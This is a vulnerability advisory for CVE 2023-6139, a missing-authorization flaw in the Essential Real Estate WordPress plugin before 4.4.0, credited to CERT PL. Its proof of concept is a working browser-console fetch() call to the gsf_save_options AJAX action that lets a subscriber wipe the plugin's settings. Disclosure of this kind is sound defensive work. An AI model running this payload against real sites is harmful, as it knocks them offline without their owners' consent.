Essential Real Estate < 4.4.0 – Subscriber+ Denial of Service via Arbitrary Option Update | CVE 2023-6139 | Plugin Vulnerabilities

Description

The plugin does not apply proper capability checks on its AJAX actions, which among other things, allow attackers with a subscriber account to conduct Denial of Service attacks.

Proof of Concept

1. login, and visit https://vulnerable-site.tld/wp-admin/profile.php?action=delete
2. run the following in your browser console: 

fetch("/wp-admin/admin-ajax.php?action=gsf_save_options", {"headers": {"content-type": "application/x-www-form-urlencoded",},"body": `_wpnonce=${GSF_META_DATA['nonce']}&_current_preset=template`,"method": "POST",}).then((response) => {return response.text();    }).then((data) => {console.log(data);})

The same can be achieved via other AJAX actions in the plugin, like "gsf_import_theme_options".

Affects Plugins

essential-real-estate

Fixed in 4.4.0

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając (CERT PL)

Submitter

Krzysztof Zając (CERT PL)

Submitter website

https://cert.pl

Submitter twitter

Verified

Yes

WPVDB ID

96396a22-f523-4c51-8b72-52be266988aa

Timeline

Publicly Published

2023-12-18 (about 2 years ago)

Added

2023-12-18 (about 2 years ago)

Last Updated

2023-12-18 (about 2 years ago)

Other

Published

Title

Published

2024-01-08

Title

RabbitLoader < 2.19.14 - Missing Authorization via multiple AJAX actions

Published

2024-11-12

Title

Buy one click WooCommerce <= 2.2.9 - Missing Authorization to Authenticated (Subscriber+) Settings Export

Published

2024-01-04

Title

Cloudflare < 4.12.3 - Missing Authorization via initProxy

Published

2024-07-23

Title

Social Auto Poster < 5.3.15 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Post Meta Update via wpw_auto_poster_update_tweet_template

Published

2025-08-22

Title

Church Admin < 5.0.27 - Missing Authorization